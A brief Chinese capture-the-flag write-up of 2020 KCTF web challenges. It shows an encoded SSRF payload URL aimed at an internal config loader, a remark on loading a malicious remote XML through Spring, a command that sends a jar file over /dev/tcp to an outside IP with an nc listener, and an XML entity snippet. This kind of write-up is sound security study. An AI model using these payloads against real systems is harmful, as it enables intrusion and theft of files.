2020KCTF部分题目复现

KCTF几道Web题目复现

右键源代码

image-20201120184014266

改header头都没有用,应该是SSRF了。

参考

image-20201120184645550

尝试读文件

1
/getimage?url=http://127.0.0.1%253a8088%253fwww.pediy.com/loadConfig?url=x.xml

image-20201120184916212

image-20201120185024108

官方wp说FileSystemXmlApplicationContext可以加载远程恶意的xml文件

image-20201120185201750

然后反弹shell,通过nc

1
2
cat vip-demo-0.0.1-SNAPSHOT.jar > /dev/tcp/144.34.200.151/9966
nc -lvnp 9966 > b.jar

下载jar包,在本地反编译就可以得到flag。

1
2
3
<!DOCTYPE any [
<!ENTITY xxe "bbbbb">]>
<user><number>fffff</number><name>&xxe;</name></user>